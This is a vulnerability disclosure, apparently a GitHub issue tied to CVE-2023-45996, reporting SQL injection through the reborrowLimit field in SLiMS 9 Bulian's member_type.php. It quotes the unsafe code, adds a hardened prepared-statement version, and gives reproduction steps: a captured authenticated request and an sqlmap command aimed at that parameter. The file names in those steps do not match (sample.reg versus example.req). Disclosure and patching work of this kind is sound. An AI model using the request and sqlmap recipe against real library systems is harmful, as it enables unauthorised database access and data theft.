CVE-2023-45996: Vuln0wned Report: SQL Injection in member_type.php · Issue #216 · slims/slims9_bulian
SQL injection vulnerability in Senayan Library Management Systems Slims v.9 and Bulian v.9.6.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via a crafted script to the reborrowLimit parameter in the member_type.php.
The Bug
A SQL injection was found in admin/modules/membership/member_type.php, in the code below, where the reborrowLimit POST parameter (like several neighbouring fields) is copied into $data without validation or escaping:
$data['member_type_name'] = $dbs->escape_string($memberTypeName);
$data['loan_limit'] = trim($_POST['loanLimit']);
$data['loan_periode'] = trim($_POST['loanPeriode']);
$data['enable_reserve'] = $_POST['enableReserve'];
$data['reserve_limit'] = $_POST['reserveLimit'];
$data['member_periode'] = $_POST['memberPeriode'];
$data['reborrow_limit'] = $_POST['reborrowLimit'];
$data['fine_each_day'] = $_POST['fineEachDay'];
$data['grace_periode'] = $_POST['gracePeriode'];
$data['input_date'] = date('Y-m-d');
$data['last_update'] = date('Y-m-d');
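As an added example (not SLiMS project code), the following is a hardened form of the assignment block above: every numeric form field is validated as a non-negative integer before use, and the update is sent through a prepared statement so the values are bound rather than concatenated into the SQL text. It assumes a mysqli connection in $dbs, a `member_type` table keyed by `member_type_id`, PHP 8.1+ (for `mysqli_stmt::execute()` with a parameter array), and that all of these columns are integers in this install; those names and types are assumptions, not taken from the report.

```php
<?php
// Added example, not SLiMS code: hardened handling of the member_type.php form.
// Assumes $dbs is a mysqli connection and the table/column names below exist.
declare(strict_types=1);

/**
 * Validate the member-type form fields. Returns a column => value array
 * or throws on the first field that is not a non-negative integer.
 */
function validateMemberTypeInput(array $post): array
{
    // Fixed map of form parameter -> column name; request data never picks columns.
    $intFields = [
        'loanLimit'     => 'loan_limit',
        'loanPeriode'   => 'loan_periode',
        'enableReserve' => 'enable_reserve',
        'reserveLimit'  => 'reserve_limit',
        'memberPeriode' => 'member_periode',
        'reborrowLimit' => 'reborrow_limit',   // the field abused in this report
        'fineEachDay'   => 'fine_each_day',
        'gracePeriode'  => 'grace_periode',
    ];
    $data = [];
    foreach ($intFields as $param => $column) {
        // FILTER_VALIDATE_INT rejects anything that is not a plain integer,
        // so quotes, comments, keywords, or time-based payloads never reach SQL.
        $value = filter_var($post[$param] ?? null, FILTER_VALIDATE_INT,
                            ['options' => ['min_range' => 0]]);
        if ($value === false) {
            throw new InvalidArgumentException("Field {$param} must be a non-negative integer");
        }
        $data[$column] = $value;
    }
    $name = trim((string)($post['memberTypeName'] ?? ''));
    if ($name === '' || mb_strlen($name) > 50) {
        throw new InvalidArgumentException('memberTypeName is required (max 50 chars)');
    }
    $data['member_type_name'] = $name;
    return $data;
}

/**
 * Update one member_type row with a prepared statement.
 * Column names come from the fixed map above (our own constants), so they
 * may appear in the SQL text; every value is bound as a parameter.
 */
function updateMemberType(mysqli $dbs, int $recordId, array $data): bool
{
    $setClause = implode(', ', array_map(fn(string $c) => "`{$c}` = ?", array_keys($data)));
    $sql = "UPDATE member_type SET {$setClause}, last_update = CURDATE() "
         . "WHERE member_type_id = ?";
    $stmt = $dbs->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $dbs->error);
    }
    $values   = array_values($data);
    $values[] = $recordId;
    $ok = $stmt->execute($values);   // PHP 8.1+: values bound by position
    $stmt->close();
    return $ok;
}

// Usage inside the POST handler (after the existing CSRF and privilege checks).
try {
    $recordId = filter_var($_POST['updateRecordID'] ?? null, FILTER_VALIDATE_INT,
                           ['options' => ['min_range' => 1]]);
    if ($recordId === false) {
        throw new InvalidArgumentException('updateRecordID must be a positive integer');
    }
    $data = validateMemberTypeInput($_POST);
    if (!updateMemberType($dbs, $recordId, $data)) {
        throw new RuntimeException('update failed: ' . $dbs->error);
    }
} catch (InvalidArgumentException $e) {
    http_response_code(400);          // reject the request; nothing touched the database
    echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
}
```

The key point is that the fix is not escaping alone: a field that is supposed to be an integer should be rejected outright when it is not one, and the query should be parameterised so that even a field that slips through cannot change the statement's structure.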
To Reproduce
Steps to reproduce the behavior:
Log in as admin or as a user that has access to membership types
Make sure Burp is running to capture the request, as in the screenshot below
Save the request in a separate file (sample.reg)
sample.reg example
POST /slims9_bulian-9.6.1/admin/modules/membership/member_type.php?itemID=2&detail=true&ajaxload=1& HTTP/1.1
Host: localhost
Content-Length: 1420
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQUBKpazqdLdsHspa
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=membership
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SenayanAdmin=f5581i7ero1b1mitlh328upvmt; admin_logged_in=1; SenayanMember=37qocaml59lu0snk1tt3n74qgn
Connection: close
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="csrf_token"
29ad9eb49edd5718652dff82f33e7ecb4000e5f376eac9d52346c6843c5b9d16
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="form_name"
mainForm
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="memberTypeName"
abcdef
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="loanLimit"
0
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="loanPeriode"
0
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="enableReserve"
1
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="reserveLimit"
0
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="memberPeriode"
1
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="reborrowLimit"
4423
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="fineEachDay"
1
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="gracePeriode"
0
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="saveData"
Update
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="updateRecordID"
2
------WebKitFormBoundaryQUBKpazqdLdsHspa--
Run the test with the following command:
sqlmap -r example.req --level 5 --risk 3 -p reborrowLimit --random-agent --dbms=mysql --current-user
- You’ve entered into the system
Screenshots
Versions
- OS: Windows
- Browser: Brave Browser | Version 1.57.57 Chromium: 116.0.5845.163 (Official Build) (64-bit)
- Slims Version: slims9_bulian-9.6.1